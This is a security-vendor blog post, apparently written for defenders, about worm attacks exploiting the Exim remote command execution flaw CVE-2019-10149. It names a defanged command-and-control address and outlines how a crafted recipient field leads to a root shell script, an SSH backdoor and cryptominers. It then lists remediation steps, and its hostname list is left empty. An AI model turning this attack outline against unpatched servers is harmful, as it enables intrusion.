An Exim server is a mail transfer agent used on Linux like operating systems. Exim is a free software and used by as much as 57% of the Internet email servers. Over the past couple weeks it has been noted that a heavy amount of Exim servers are under attack from two separate hacker groups.
What's the Vulnerability?
In typical fashion anytime a new vulnerability is released there is always a person or group that tries to exploit that vulnerability in the wild. The vulnerability and exploit CVE –2019– 10149 was a security flaw publicly disclosed on June 5. The exploit is a remote command execution exploit that allows the improper validation of recipient address in the deliver_message() function.
What's the Attack?
It is estimated that there are between 500,000 in 5.4 million Exim servers currently installed across the Internet. The attacks seen to date take over unpatched systems via a worm. The compromised host will then scan the Internet for other servers and attempts to infect them as well. Infected servers will then be configured as cryptocurrency miners.
Some organizations have also report that these attacks create a back door into Exim servers by downloading a shell script to adds and SSH key to the root account.
How do I identify the signature?
According to many organizations via Twitter the first wave of attacks began on June 9. According to those reporting me exploit their are two command and control servers one of which is known, the address is http://173[.]212.214.137/s
The second type of attack is a little harder to identify. But basically goes something like this:
The attackers send an email with "localpart" crafted to exploit the Exim vulnerability using the RCPT_to field.
Exim servers execute the "localpart" in their own user context when received. The part of the Envelope-From will download the nefarious shell script and execute it.
Since most Exim servers run as root, any nefarious script is also run as root then it’s Thanks for shopping for fresh pwnage.
Patch every EXIM installation you have in your organization, at this time the current version is 4.92.
Look for any unfamiliar cronjobs in your crontab and remove them. Restore legitimate cron jobs from existing backups.
Delete the authorized key used for SSH backdoor access.
Kill any cryptominer process and delete the application.
Check your firewall and access logs for the following hostnames:
Justin (he/him) is the founder and CEO of NuHarbor Security, where he continues to advance modern integrated cybersecurity services. He has over 20 years of cybersecurity experience, much of it earned while leading security efforts for multinational corporations, most recently serving as global CISO at Keurig Green Mountain Coffee. Justin serves multiple local organizations in the public interest, including his board membership at Champlain College.